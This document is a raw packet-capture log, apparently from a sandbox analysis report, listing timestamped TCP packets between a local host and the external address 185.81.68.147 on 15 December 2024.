                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.454654932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.455252886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.455461025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.455518007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.456036091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.456188917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.456248045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.456934929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.457103968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.457163095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.457729101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.457997084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.458053112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.458565950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.458616972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.458676100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.459412098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.459566116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.459616899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.460310936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.460460901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.460514069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.461090088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.461324930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.461379051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.461983919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.462049961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.462109089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.462757111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.462810040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.462899923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.463578939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.463709116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.463783026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.464402914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.464513063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.464564085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.465244055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.465311050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.465363979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.466202021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.466310024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.466361046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.466876030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.467006922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.467060089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.467823982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.467900038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.467951059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.468622923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.468679905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.468733072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.469405890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.469537973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.469589949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.470240116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.470407009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.470463037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.471108913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.471309900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.471364975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.471932888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.471997976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.472053051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.472748995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.472882032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.472939968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.473592997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.473813057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.473877907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.474385023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.474498034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.474556923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.475243092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.475327969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.475382090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.476094007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.476222038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.476280928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.476907015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.476933956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.476999998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.477751970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.477931023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.477987051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.478549957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.478682995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.478740931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.479401112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.479517937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.479568958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.480237961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.480351925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.480402946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.481074095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.481179953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.481230974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.481898069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.481992006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.482043028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.482712984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.482831001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.482894897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.483562946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.483711004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.483769894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.484417915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.484513044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.484627962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.485244989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.485336065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.485388041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.486399889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.495652914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.495721102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.495729923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.495815039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.495862007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.495898962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.496604919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.496660948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.496711969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.497436047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.497504950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.497589111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.499341011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.499430895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.499502897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.499674082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.499730110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.499772072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.500462055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.500510931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.500569105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.501362085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.501413107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.501590967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.502224922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.502265930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.502274990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.502873898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.502927065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.502948046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.503545046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.503596067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.503644943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.505286932 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.547430992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.643563032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.643585920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.643661022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.643671989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.643747091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.643785954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.644444942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.644594908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.644666910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.645320892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.645404100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.645457983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.646610975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.646723986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.646775961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.647461891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.647610903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.647681952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.648386002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.648463011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.648516893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.648993969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.649059057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.649113894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.649786949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.649866104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.649920940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.650585890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.650654078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.650713921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.651263952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.651350021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.651400089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.651968956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.652374029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.652427912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.653076887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.653111935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.653165102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.653968096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.654143095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.654196978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.654889107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.654927015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.654978037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.655420065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.655498981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.655550957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.656312943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.656390905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.656441927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.656953096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.657051086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.657104015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.657805920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.657879114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.657929897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.658634901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.658720970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.658777952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.659483910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.659606934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.659657001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.660325050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.660454035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.660504103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.661135912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.661325932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.661376953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.662280083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.662502050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.662550926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.663141012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.663173914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.663232088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.663718939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.663793087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.663847923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.664459944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.664527893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.664578915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.665282011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.665364027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.665437937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.666126013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.666260958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.666309118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.666960955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.667092085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.667149067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.667790890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.667898893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.667960882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.668621063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.668744087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.668803930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.669492960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.669637918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.669691086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.670336962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.670403957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.670454025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.671324968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.671478033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.671535015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.672003031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.672085047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.672137976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.672856092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.672976017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.673026085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.673657894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.673753977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.673804998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.674463987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.674557924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.674608946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.675304890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.675400019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.675472021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.676281929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.676311016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.676356077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.676990032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.677021027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.677071095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.678100109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.678174019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.678225040 CET4970980192.168.2.8185.81.68.147
